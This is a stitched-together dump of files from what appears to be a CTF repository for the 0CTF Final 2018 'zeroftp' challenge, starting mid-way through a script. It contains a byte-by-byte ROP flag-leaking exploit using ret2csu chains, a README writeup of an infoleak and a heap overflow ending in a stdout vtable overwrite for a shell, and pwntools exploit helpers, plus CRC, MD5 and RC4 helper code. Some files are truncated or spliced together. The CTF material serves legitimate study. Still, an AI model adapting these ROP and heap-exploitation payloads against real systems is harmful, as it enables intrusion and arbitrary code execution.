ret2csu(0x400a1d,safe_bss,calc(0x400a1d+1,safe_bss-0x100+0x10),trash_place,0x0,safe_bss-0x100) solve='' i=0 while True: info("The %d byte"%i) suc=False for char in dicti: p=process('./pow.py') proof_of_work() safe_bss=0x00601800 trash_place=safe_bss+0x700 flag_buf=0x601c08 read_plt=0x400730 alarm_plt=0x400720 ret=0x4006b9 sendstr='' payload='a'*0x20+p64(safe_bss)+\ pop_rdi(0)+pop_rsi_r15(safe_bss-0x100,0)+p64(read_plt)+\ pop_rdi(0)+pop_rsi_r15(safe_bss,0)+p64(read_plt)+\ p64(0x400985) sendstr=sendstr+payload.ljust(0x100,'\x00') # p.send(payload.ljust(0x100,'\x00')) sendstr=sendstr+('flag\x00\x00\x00\x00'+p64(alarm_plt)+p64(0x400730)*7+p64(0x400a26)).ljust(0x100,'\x00') # p.send(('flag\x00\x00\x00\x00'+p64(alarm_plt)).ljust(0x100,'\x00')) payload=p64(read_plt)+ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),0x1,0x601040,0)+\ ret2csu(safe_bss-1+0x100,safe_bss+0x100,calc(safe_bss+0x100,safe_bss),0x500,safe_bss+0x100,0)+\ p64(0)*2+p64(safe_bss+0x100)+p64(0)*4+leave_ret() sendstr=sendstr+payload.ljust(0x100,'\x00')+'\x05' # p.send(payload.ljust(0x100,'\x00')) # p.send('\x05') # 0x400828 : add byte ptr [rcx], al ; ret payload=p64(read_plt)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),0x2,trash_place,0)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss-0x100+8),trash_place,0x0,safe_bss-0x100)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),i,trash_place,3)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),0x1,flag_buf,3)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),0x3,trash_place,0)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss-0x100+8),trash_place,0x0,safe_bss-0x100)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),0,0,3)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),0x2,trash_place,0)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss-0x100+8),trash_place,0x0,safe_bss-0x100)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),i,trash_place,4)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss),0x0,flag_buf+8,4)+\ p64(0)*7+p64(0x400a2a)+p64(0xffffffffffffffff)+p64(0xffffffffffffff00|ord(char))+p64(0)*4+p64(0x400a21)+p64(0)*7+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss-0x100+0x10),0x400-0x10,safe_bss,0)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss-0x100+0x10),0x400-0x10,safe_bss,0)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss-0x100+0x10),0x400-0x10,safe_bss,0)+\ ret2csu(safe_bss-1,safe_bss,calc(safe_bss,safe_bss-0x100+0x10),0x400-0x10,safe_bss,0) # //infinite_loop() sendstr=sendstr+payload.ljust(0x500,'\x00')+'a'*2+'a'*3+'\x00' # time_start=time.time() p.send(sendstr.ljust(0x1000,'\x00')) # p.send(payload.ljust(0x500,'\x00')) # p.send('a'*2) # p.recv() try: p.recv(1) p.recv(1,timeout=1) solve=solve+char suc=True print "success for char:%s"%char print "\nCurrent solve:%s\n"%solve p.close() break except Exception as e: print "failed for char:%s"%char p.close() # time_end=time.time() if not suc: print "\n[*] Finished!" break else: i=i+1 # print time_end-time_start # p.interactive() print solve ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/Makefile ================================================ CC = gcc CFLAG = -g -D_FORTIFY_SOURCE=2 -w -D ZEROFS -D SHELL -D PWN LDFLAG = -z now PROG = zeroftp zero_pack md5 zero_utils crc32 zerofs EXEC = zeroftp debug: $(EXEC) zeroftp: $(PROG:=.o) $(CC) $(LDFLAG) $^ -o $(EXEC) %.o: %.c $(CC) $(CFLAG) -g -c $< -o $@ clean: rm -f $(EXEC) $(PROG:=.o) ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/README.md ================================================ # VTP1 & VTP2 Writeup VTP means vulnerable transfer protocol. It contains a private protocol implementing part of FTP commands and a filesystem designed by ourself. VTP1 and VTP2 shares the same binary and the binary is running on Ubuntu 16.04. For VTP1, you have to get the first flag by reversing the binary and find out the backdoor. For VTP2, you have to exploit the bug in the binary and then get shell to find the second flag. ## VTP1 ### Protocol Design The protocol we designed is described as follows. The magic number is `0xdd`, and data_length is represented in `big-endian`. After that is `data`. At the end of payload, there is a crc32 of `data`. ``` | magic | data_length(big endian) | data | check_sum | | ------ | ---------------------- | ---- | --------- | ``` To make the challenge more interesting, we define 5 types of `variable` used in the protocol `data`. `Variable` starts with a byte called `info`. `Info` will indicates the type of `variable` and other variable type specified information. Detailed Design of `variable` can be described as follows. ``` bits[0:3] - types types: 1. bool bits[3] - value 0 or 1 2. string null terminated 3. raw bits[3] - short raw (0) or long raw (1) if short raw bits[4:8] - length elif long raw bits[4:8] - length of length 4. int bits[4] - endian (0 for little-endian and 1 for big-endian) bits[5:8] - length 5. list bits[3:8] - length of length ``` For example, 0x9(0b1001) means the data type is boolean and the value is True. Further, for `raw` if it is a short raw(bits[3]==0), then bits[4:8] represented the length of `raw` data. If not, then bits[4:8] represented the length of `raw` data length. After `variable` is known, we should know how to use `variable` to send a VTP command. Firstly there are 12 types of command implemented like FTP showed as follows. ``` enum zeroftp_cmd_type { ZEROFTP_LOGIN = 1, ZEROFTP_LS, ZEROFTP_CD, ZEROFTP_MKDIR, ZEROFTP_RMDIR, ZEROFTP_RDFILE, ZEROFTP_WRFILE, ZEROFTP_RMFILE, ZEROFTP_FILEINFO, ZEROFTP_SETFILEINFO, ZEROFTP_BACKDOOR, ZEROFTP_QUIT, }; ``` For example, if you want to send a ZEROFTP_LOGIN command, `data` should starts with a `command_type` which is represented by `int variable` and its value is `1`. Following the `command_type` is `username(string)` and `password(raw)`. You can check The following whole VTP commands specification. ``` LOGIN : command_type(int) + username(string) + password(raw) LS : command_type(int) + filename(string) CD : command_type(int) + dirname(string) MKDIR : command_type(int) + dirname(string) RMDIR : command_type(int) + dirname(string) RDFILE : command_type(int) + filename(string) WRFILE : command_type(int) + filename(string) + file_content(raw) RMFILE : command_type(int) + filename(string) FILEINFO : command_type(int) + filename(string) + fileinfo_type(int, optional) SETFILEINFO : command_type(int) + filename(string) + fileinfo_type(int) + fileinfo(string or int) BACKDOOR : command_type(int) + filename(string) ``` ## Backdoor Now to get the flag of VTP1, you should use `BACKDOOR` command. `BACKDOOR` will read the file which is specified by the filename in the VTP command, in the server's real filesystem and write the content to the self-made fs. But as you know, flag is stored as `here_is_your_flag/flag`, so you have to use `MKDIR` to make a directory called `here_is_your_flag` in the self-made fs before using `BACKDOOR`. Afterwards use `RDFILE` and get your first flag of VTP! ### Exploit Here is PoC for VTP1 ``` zeroftp_login('admin', 'admin') zeroftp_mkdir('here_is_your_flag') zeroftp_backdoor("here_is_your_flag/flag") flag = zeroftp_rdfile("here_is_your_flag/flag") log.info('get the flag:{}'.format(flag)) ``` ## VTP2 For challenge 2, you're preferred to get shell to get the second flag. There are two intended bugs lies on the binary. ### Infoleak (bug1) The first one is, when unpacking `variable`, VTP won't check whether the length of `variable` will exceed the `data`, which means when you send a `variable`, you can set the length in `info` longer than the real following data length. For example, we can send a `raw` as follows. ``` b4 00 00 10 00 00 41 41 41 41 ``` But how to exploit the bug? Just use `WRFILE`, and forge the file content(`raw`) as above. Then VTP will write the filecontent containing `AAAA` and other data lies on heap behind `data`. Then we will get a infoleak after using `RDFILE`. Here is the PoC for infoleak. Heap address and libc address can be leaked. ``` def leak(): zeroftp_login('admin', 'admin') zeroftp_wrfile('X'*0x100, 'x'*0x100) zeroftp_rmfile('X'*0x100) payload = zero_pack_int(0x7, endian='big') payload += zero_pack_string('Y'*8) # raw info = 0 info = BITS_SET_VAL(info, 0, 3, 3) len_len = (len(bin(0xf0)[2:])-1)/8+1 raw_len= pack(0xf0, 8*len_len, endian='little') info = BITS_SET_VAL(info, 3, 4, 1) info = BITS_SET_VAL(info, 4, 8, len_len) payload += chr(info) payload += raw_len payload += 'bbbbbbbb' zero_send(payload) ret = zero_recv() ret = zeroftp_rdfile('Y'*8) libc.address = u64(ret[0x2a:][:8]) - 0x3c4b98 heap = u64(ret[0x2a+8:][:8]) - 0x470 log.info(hex(libc.address)) log.info(hex(heap)) zeroftp_rmfile('Y'*0x8) return libc.address, heap ``` ### buffer overflow (bug2) The other intended one is that a buffer overrun will be invoked if you opened enough files and don't close them. Before explaining details about this bug, we should have a little knowledge of some important structures of the self-made filesystem(The structures defined in our self-made filesystem are similar to those of popular filesystems). Those structures are listed as follows. For each file, VTP use `struct fnode_t` to record its attributes and use `zerofs_state->io_files` to record all of the opened file descriptor. ``` typedef struct fnode_t { union { struct fnode_t *child; long int inumber; } info; perm_t perm; file_t type; time_t createTime; time_t modifyTime; long int userId; struct fnode_t *parent; struct fnode_t *brother; char *name; } fnode_t; typedef struct IOFile { long int cur; fnode_t *fnode; int flags; } IOFile; typedef struct { long int userId; char *username; zerofs_disk *disk; fnode_t *root; fnode_t *pwd; IOFile *io_files[FD_MAX]; } zerofs_state; ``` Now here is the pseudocode of the buggy function. ``` __int64 __fastcall insert_IOFile_4056D5(__int64 a1) { int fd; // [rsp+14h] [rbp-4h] for ( fd = 0; state->io_files[fd]); ++fd ) ; state->io_files[fd] = io_file; return fd; } ``` Here fd is used as index of `state->io_files` to store `IOFILE` structure pointers. So if we create enough files and dont't close them, state->io_files buffer will be overflowed and `IOFILE` structure pointer will be written to the next chunks on the heap(state->io_files lies on heap). Before exploiting the bug, we still need a command which won't close fd. Yeah, It's `RDFILE`. Now by using `RDFILE` continuously, io_file will be written to the area that was originally zero. ### Exploit Since the field `brother` of `fnode_t` may be zero, we can try to overwrite it with `IOFILE` structure pointer. After opened 0x2e files, the next opening file operation will lead to the first file's fnode's `brother` field being written as io_file pointer, which means we are able to forge a fnode now. Since the size of `IOFILE` is 0x20 and the size of `fnode_t` is 0x50, we can forge the first 0x20 bytes of fnode by controling `IOFILE` and forge the next 0x30 bytes by controling the following chunk's content. Luckily, the following 0x30 bytes is the head of "root fnode". But how to get an arbitrary writing? My idea is to control `name` field of the forged fnode and then rename the file relating to the forged fnode. It's easy to control field `name` by using `setfileinfo('/', 5, 0xdeadbeefdeadbeef)` where `5` means modifytime, one arttribute of the file. Now we have realized arbitrary write and have the knowledge of the libc address and heap address. Just prepare a `_IO_jump_t` filled with `magic system` on heap and overwrite `vtable` field of stdout to point to the forged vtable to get shell. PoC is showed as follows. ``` for i in xrange(0x2e): zeroftp_wrfile('%08d' % i, 'x'*0x10) for i in xrange(0x1e): zeroftp_rdfile('%08d' % (i+0x10)) zeroftp_wrfile('%08d' % 0x2e, p64(libc.address+0x4526a)*32) zeroftp_rdfile('%08d' % 0x2e) zeroftp_setfileinfo('/', 2 , heap + 0x110) zeroftp_setfileinfo('/', 4 , 0) zeroftp_setfileinfo('/', 5 , libc.address+0x3c56f8) zeroftp_setfileinfo(p64(libc.address+0x3c36e0)[:6], 0, p64(heap+0x1b90)) ``` [exp.py](https://github.com/ZhangZhuoSJTU/MyCTF/blob/master/2018/0CTF_Final/zeroftp/exp.py) [source code](https://github.com/ZhangZhuoSJTU/MyCTF/tree/master/2018/0CTF_Final/zeroftp) ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/crc32.c ================================================ /*----------------------------------------------------------------------------*\ * CRC-32 version 2.0.0 by Craig Bruce, 2006-04-29. * * This program generates the CRC-32 values for the files named in the * command-line arguments. These are the same CRC-32 values used by GZIP, * PKZIP, and ZMODEM. The Crc32_ComputeBuf() can also be detached and * used independently. * * THIS PROGRAM IS PUBLIC-DOMAIN SOFTWARE. * * Based on the byte-oriented implementation "File Verification Using CRC" * by Mark R. Nelson in Dr. Dobb's Journal, May 1992, pp. 64-67. * * v1.0.0: original release. * v1.0.1: fixed printf formats. * v1.0.2: fixed something else. * v1.0.3: replaced CRC constant table by generator function. * v1.0.4: reformatted code, made ANSI C. 1994-12-05. * v2.0.0: rewrote to use memory buffer & static table, 2006-04-29. * v2.1.0: modified by Nico, 2013-04-20 \*----------------------------------------------------------------------------*/ #include "crc32.h" /*----------------------------------------------------------------------------*\ * NAME: * Crc32_ComputeBuf() - computes the CRC-32 value of a memory buffer * DESCRIPTION: * Computes or accumulates the CRC-32 value for a memory buffer. * The 'inCrc32' gives a previously accumulated CRC-32 value to allow * a CRC to be generated for multiple sequential buffer-fuls of data. * The 'inCrc32' for the first buffer must be zero. * ARGUMENTS: * inCrc32 - accumulated CRC-32 value, must be 0 on first call * buf - buffer to compute CRC-32 value for * bufLen - number of bytes in buffer * RETURNS: * crc32 - computed CRC-32 value * ERRORS: * (no errors are possible) \*----------------------------------------------------------------------------*/ unsigned long crc32_compute(unsigned long inCrc32, const void *buf, size_t bufLen) { static const unsigned long crcTable[256] = { 0x00000000,0x77073096,0xEE0E612C,0x990951BA,0x076DC419,0x706AF48F,0xE963A535, 0x9E6495A3,0x0EDB8832,0x79DCB8A4,0xE0D5E91E,0x97D2D988,0x09B64C2B,0x7EB17CBD, 0xE7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0xF3B97148,0x84BE41DE,0x1ADAD47D, 0x6DDDE4EB,0xF4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0xFD62F97A,0x8A65C9EC, 0x14015C4F,0x63066CD9,0xFA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0xD56041E4, 0xA2677172,0x3C03E4D1,0x4B04D447,0xD20D85FD,0xA50AB56B,0x35B5A8FA,0x42B2986C, 0xDBBBC9D6,0xACBCF940,0x32D86CE3,0x45DF5C75,0xDCD60DCF,0xABD13D59,0x26D930AC, 0x51DE003A,0xC8D75180,0xBFD06116,0x21B4F4B5,0x56B3C423,0xCFBA9599,0xB8BDA50F, 0x2802B89E,0x5F058808,0xC60CD9B2,0xB10BE924,0x2F6F7C87,0x58684C11,0xC1611DAB, 0xB6662D3D,0x76DC4190,0x01DB7106,0x98D220BC,0xEFD5102A,0x71B18589,0x06B6B51F, 0x9FBFE4A5,0xE8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0xE10E9818,0x7F6A0DBB, 0x086D3D2D,0x91646C97,0xE6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0xF262004E, 0x6C0695ED,0x1B01A57B,0x8208F4C1,0xF50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA, 0xFCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0xFBD44C65,0x4DB26158,0x3AB551CE, 0xA3BC0074,0xD4BB30E2,0x4ADFA541,0x3DD895D7,0xA4D1C46D,0xD3D6F4FB,0x4369E96A, 0x346ED9FC,0xAD678846,0xDA60B8D0,0x44042D73,0x33031DE5,0xAA0A4C5F,0xDD0D7CC9, 0x5005713C,0x270241AA,0xBE0B1010,0xC90C2086,0x5768B525,0x206F85B3,0xB966D409, 0xCE61E49F,0x5EDEF90E,0x29D9C998,0xB0D09822,0xC7D7A8B4,0x59B33D17,0x2EB40D81, 0xB7BD5C3B,0xC0BA6CAD,0xEDB88320,0x9ABFB3B6,0x03B6E20C,0x74B1D29A,0xEAD54739, 0x9DD277AF,0x04DB2615,0x73DC1683,0xE3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8, 0xE40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0xF00F9344,0x8708A3D2,0x1E01F268, 0x6906C2FE,0xF762575D,0x806567CB,0x196C3671,0x6E6B06E7,0xFED41B76,0x89D32BE0, 0x10DA7A5A,0x67DD4ACC,0xF9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0xD6D6A3E8, 0xA1D1937E,0x38D8C2C4,0x4FDFF252,0xD1BB67F1,0xA6BC5767,0x3FB506DD,0x48B2364B, 0xD80D2BDA,0xAF0A1B4C,0x36034AF6,0x41047A60,0xDF60EFC3,0xA867DF55,0x316E8EEF, 0x4669BE79,0xCB61B38C,0xBC66831A,0x256FD2A0,0x5268E236,0xCC0C7795,0xBB0B4703, 0x220216B9,0x5505262F,0xC5BA3BBE,0xB2BD0B28,0x2BB45A92,0x5CB36A04,0xC2D7FFA7, 0xB5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0xEC63F226,0x756AA39C,0x026D930A, 0x9C0906A9,0xEB0E363F,0x72076785,0x05005713,0x95BF4A82,0xE2B87A14,0x7BB12BAE, 0x0CB61B38,0x92D28E9B,0xE5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0xF1D4E242, 0x68DDB3F8,0x1FDA836E,0x81BE16CD,0xF6B9265B,0x6FB077E1,0x18B74777,0x88085AE6, 0xFF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0xF862AE69,0x616BFFD3,0x166CCF45, 0xA00AE278,0xD70DD2EE,0x4E048354,0x3903B3C2,0xA7672661,0xD06016F7,0x4969474D, 0x3E6E77DB,0xAED16A4A,0xD9D65ADC,0x40DF0B66,0x37D83BF0,0xA9BCAE53,0xDEBB9EC5, 0x47B2CF7F,0x30B5FFE9,0xBDBDF21C,0xCABAC28A,0x53B39330,0x24B4A3A6,0xBAD03605, 0xCDD70693,0x54DE5729,0x23D967BF,0xB3667A2E,0xC4614AB8,0x5D681B02,0x2A6F2B94, 0xB40BBE37,0xC30C8EA1,0x5A05DF1B,0x2D02EF8D }; unsigned long crc32; unsigned char *byteBuf; size_t i; /** accumulate crc32 for buffer **/ crc32 = inCrc32 ^ 0xFFFFFFFF; byteBuf = (unsigned char*) buf; for (i = 0; i < bufLen; i++) { crc32 = (crc32 >> 8) ^ crcTable[(crc32 ^ byteBuf[i]) & 0xFF]; } return crc32 ^ 0xFFFFFFFF; } ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/crc32.h ================================================ #ifndef CRC32_H_ #define CRC32_H_ #include #include #define CRC_BUFFER_SIZE 8192 unsigned long crc32_compute(unsigned long inCrc32, const void *buf, size_t bufLen); #endif ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/enc_sock.c ================================================ #include #include #include #include #include #include #include #include "enc_sock.h" #ifdef DEBUG #define LOG(...) printf(__VA_ARGS__) #define LOG_ERROR(...) perror(__VA_ARGS__) #else #define LOG(...) #define LOG_ERROR(...) #endif uc key[P_BITLEN/8] = {0}; uc s[258] = {0}; void zero_error(const char*s) { LOG_ERROR(s); exit(1); } void init_rc4() { int i; uc k[256]; uc tmp, j = 0; for (i = 0; i < 256; ++i) { s[i] = i; k[i] = key[i%(P_BITLEN/8)]; } for (i = 0; i < 256; ++i) { j += s[i] + k[i]; tmp = s[i]; s[i] = s[j]; s[j] = tmp; } } void crypt(uc *data, size_t len) { size_t k; uc t, tmp; for (k = 0; k < len; ++k) { s[256] += 1; s[257] += s[s[256]]; tmp = s[s[256]]; s[s[256]] = s[s[257]]; s[s[257]] = tmp; t = s[s[256]] + s[s[257]]; data[k] ^= s[t]; } } void init_dh() { BIGNUM *g, *x, *p; FILE *rand_fp; char recv_buf[P_BITLEN/4+1]; char *hex_buf; BN_CTX *ctx = BN_CTX_new(); BN_CTX_start(ctx); x = BN_CTX_get(ctx); p = BN_CTX_get(ctx); g = BN_CTX_get(ctx); BN_hex2bn(&p, P); BN_hex2bn(&g, G); BN_rand(x, P_BITLEN-1, 0, 0); #ifdef DEBUG printf("x: "); BN_print_fp(stdout, x);puts(""); #endif BN_mod_exp(g, g, x, p, ctx); #ifdef DEBUG printf("gx: "); BN_print_fp(stdout, g);puts(""); #endif hex_buf = BN_bn2hex(g); write(1, hex_buf, strlen(hex_buf)); OPENSSL_free(hex_buf); bzero(recv_buf, P_BITLEN/4+1); read(0, recv_buf, P_BITLEN/4); if (!BN_hex2bn(&g, recv_buf)) { LOG("BN_hex2bn failed."); exit(1); } #ifdef DEBUG printf("gy: "); BN_print_fp(stdout, g);puts(""); #endif BN_mod_exp(g, g, x, p, ctx); #ifdef DEBUG printf("key: "); BN_print_fp(stdout, g);puts(""); #endif BN_bn2bin(g, key); // printf("%llx\n", *(long long unsigned*)key); BN_CTX_end(ctx); BN_CTX_free(ctx); } void zero_send(void* buf, size_t len) { uc tmp_buf[1024]; ssize_t res; size_t buf_len; while (len) { if (len > 1024) buf_len = 1024; else buf_len = len; memcpy(tmp_buf, buf, buf_len); crypt(tmp_buf, buf_len); res = write(1, tmp_buf, buf_len); if (res < 0) zero_error("write"); buf += res; len -= res; } } void zero_recv(void* buf, size_t len) { ssize_t res; while (len) { res = read(0, buf, len); if (res <= 0) zero_error("read"); crypt(buf, res); #ifdef DEBUGGG int i; printf("len: %d; ", len); for (i = 0; i < res; ++i) printf("%02x", *(uc*)(buf+i)); #endif buf += res; len -= res; } #ifdef DEBUGGG printf("\n"); #endif } ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/enc_sock.h ================================================ /************************************************************************* > File Name: enc_sock.h > Author: > Mail: > Created Time: Thu 03 May 2018 10:40:10 AM CST ************************************************************************/ #ifndef _ENC_SOCK_H #define _ENC_SOCK_H #define P_BITLEN 1024 #define P "ab1b141539b31ec6468724ad0c42d177e72f17649cfc4677ca415cfeacd792e3a32c9e4f3f9c5fc0bb95fa651b4edbbe484929d8c9991bf2b00019b4e53d26bf321c6a5b4b9efe010300a696a812869f87f4d4d1ac074b505137ac0c2e0567395d7dde02f517a7cfff8021049ba5733b974e87b459b054199c6ae600414539b7" #define G "f" typedef unsigned char uc; void init_dh(); void init_rc4(); void zero_send(void *, size_t); void zero_recv(void *, size_t); #endif ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * context.terminal = ['tmux', 'splitw', '-h'] BINARY = './zeroftp' LIBC64 = './libc-2.23.so' code = ELF(BINARY) libc = ELF(LIBC64) r = process(BINARY, env={'LD_PRELOAD':LIBC64}) #r = remote('192.168.201.15', 13345) def attach(addr): if addr < 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) #### pack BITS = lambda byte, start, end:((byte>>start)&((1<<(end-start))-1)) BITS_SET = lambda byte, pos: byte|(1< #include #include #include // Constants are the integer part of the sines of integers (in radians) * 2^32. const uint32_t k[64] = { 0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee , 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501 , 0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be , 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821 , 0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa , 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8 , 0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed , 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a , 0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c , 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70 , 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05 , 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665 , 0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039 , 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1 , 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1 , 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 }; // r specifies the per-round shift amounts const uint32_t r[] = {7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21}; // leftrotate function definition #define LEFTROTATE(x, c) (((x) << (c)) | ((x) >> (32 - (c)))) void to_bytes(uint32_t val, uint8_t *bytes) { bytes[0] = (uint8_t) val; bytes[1] = (uint8_t) (val >> 8); bytes[2] = (uint8_t) (val >> 16); bytes[3] = (uint8_t) (val >> 24); } uint32_t to_int32(const uint8_t *bytes) { return (uint32_t) bytes[0] | ((uint32_t) bytes[1] << 8) | ((uint32_t) bytes[2] << 16) | ((uint32_t) bytes[3] << 24); } void md5(const uint8_t *initial_msg, size_t initial_len, uint8_t *digest) { // These vars will contain the hash uint32_t h0, h1, h2, h3; // Message (to prepare) uint8_t *msg = NULL; size_t new_len, offset; uint32_t w[16]; uint32_t a, b, c, d, i, f, g, temp; // Initialize variables - simple count in nibbles: h0 = 0x67452301; h1 = 0xefcdab89; h2 = 0x98badcfe; h3 = 0x10325476; //Pre-processing: //append "1" bit to message //append "0" bits until message length in bits ≡ 448 (mod 512) //append length mod (2^64) to message for (new_len = initial_len + 1; new_len % (512/8) != 448/8; new_len++) ; msg = (uint8_t*)malloc(new_len + 8); memcpy(msg, initial_msg, initial_len); msg[initial_len] = 0x80; // append the "1" bit; most significant bit is "first" for (offset = initial_len + 1; offset < new_len; offset++) msg[offset] = 0; // append "0" bits // append the len in bits at the end of the buffer. to_bytes(initial_len*8, msg + new_len); // initial_len>>29 == initial_len*8>>32, but avoids overflow. to_bytes(initial_len>>29, msg + new_len + 4); // Process the message in successive 512-bit chunks: //for each 512-bit chunk of message: for(offset=0; offset>start)&((1<<(end-start))-1)) BITS_SET = lambda byte, pos: byte|(1<>start)&((1<<(end-start))-1)) BITS_SET = lambda byte, pos: byte|(1<= 6: return 0 else: list_len = unpack(payload[1:1+zero_list_len], 8*zero_list_len, endian='little') payload = payload[1+zero_list_len:] for i in xrange(list_len): payload = zero_unpack(payload) return ret def zero_pack(data, types): if zero_basic_types == 'bool': ret = zero_pack_bool(data) elif zero_basic_types == 'string': ret = zero_pack_string(data) elif zero_basic_types == 'raw': ret = zero_pack_raw(data) elif zero_basic_types == 'int': ret = zero_pack_int(data) elif zero_basic_types == 'list': ret = zero_pack_list(payload) return ret def zero_unpack(payload): zero_info = ord(payload[0]) zero_basic_types = BITS(zero_info, 0, 3) assert zero_basic_types < 6 if zero_basic_types == 1: log.debug('recv: bool') ret = zero_unpack_bool(payload) elif zero_basic_types == 2: log.debug('recv: string') ret = zero_unpack_string(payload) elif zero_basic_types == 3: log.debug('recv: raw') ret = zero_unpack_raw(payload) elif zero_basic_types == 4: log.debug('recv: int') ret = zero_unpack_int(payload) elif zero_basic_types == 5: log.debug('recv: list') ret = zero_unpack_list(payload) return ret #### recv and send def zero_recv(): magic = recv(1) assert magic == '\xdd' data_length = u32(recv(4), endian='big') #log.info('data_length {}'.format(data_length)) data = recv(data_length) #log.info('data {}'.format(hexdump(data))) data_crc32 = u32(recv(4), endian='big') assert crc.crc_32(data) == data_crc32 #log.info(data.encode('hex')) return zero_unpack(data) def zero_send(data): magic = '\xdd' data_len = p32(len(data), endian='big') data_crc32 = p32(crc.crc_32(data), endian='big') payload = magic + data_len + data + data_crc32 send(payload) ## menu def zeroftp_login(username, password): payload = zero_pack_int(0x1, endian='big') payload += zero_pack_string(username) payload += zero_pack_raw(md5sum(password)) zero_send(payload) if zero_recv() == 1: log.debug('login success') else: log.debug('login fail') def zeroftp_ls(directory): payload = zero_pack_int(0x2, endian='big') payload += zero_pack_string(directory) zero_send(payload) ret = zero_recv() return ret def zeroftp_cd(directory): payload = zero_pack_int(0x3, endian='big') payload += zero_pack_string(directory) zero_send(payload) ret = zero_recv() return ret def zeroftp_mkdir(directory): payload = zero_pack_int(0x4, endian='big') payload += zero_pack_string(directory) zero_send(payload) ret = zero_recv() return ret return def zeroftp_rmdir(directory): payload = zero_pack_int(0x5, endian='big') payload += zero_pack_string(directory) zero_send(payload) ret = zero_recv() return ret return def zeroftp_rdfile(filename): payload = zero_pack_int(0x6, endian='big') payload += zero_pack_string(filename) zero_send(payload) ret = zero_recv() return ret def zeroftp_wrfile(filename, content): payload = zero_pack_int(0x7, endian='big') payload += zero_pack_string(filename) payload += zero_pack_raw(content) zero_send(payload) ret = zero_recv() return ret def zeroftp_rmfile(): payload = zero_pack_int(0x8, endian='big') return def zeroftp_fileinfo(pathname, fileinfo_elem): payload = zero_pack_int(0x9, endian='big') payload += zero_pack_string(pathname) payload += zero_pack_int(fileinfo_elem, endian='big') zero_send(payload) ret = zero_recv() return ret def zeroftp_setfileinfo(pathname, fileinfo_elem, arg3): payload = zero_pack_int(0xa, endian='big') payload += zero_pack_string(pathname) payload += zero_pack_int(fileinfo_elem, endian='big') payload += zero_pack_string(pathname) if fileinfo_elem == 0: payload += zero_pack_string(arg3) else: payload += zero_pack_int(arg3, endian='big') zero_send(payload) ret = zero_recv() return ret def zeroftp_backdoor(): payload = zero_pack_int(0xb, endian='big') payload += zero_pack_string('flag') #payload += zero_pack_raw('b1111111111111gtang') zero_send(payload) ret = zero_recv() return ret def zeroftp_exit(): return def test(): zeroftp_login('admin', 'admin') zeroftp_wrfile('./flag','hackedhackedhacked') zeroftp_wrfile('./test1','hackedhackedhacked') zeroftp_wrfile('./test2','hackedhackedhacked') directory = zeroftp_ls('/') log.info('directory {}'.format(directory)) content = zeroftp_rdfile('./flag') log.info('file {} content {}'.format('./flag', content)) 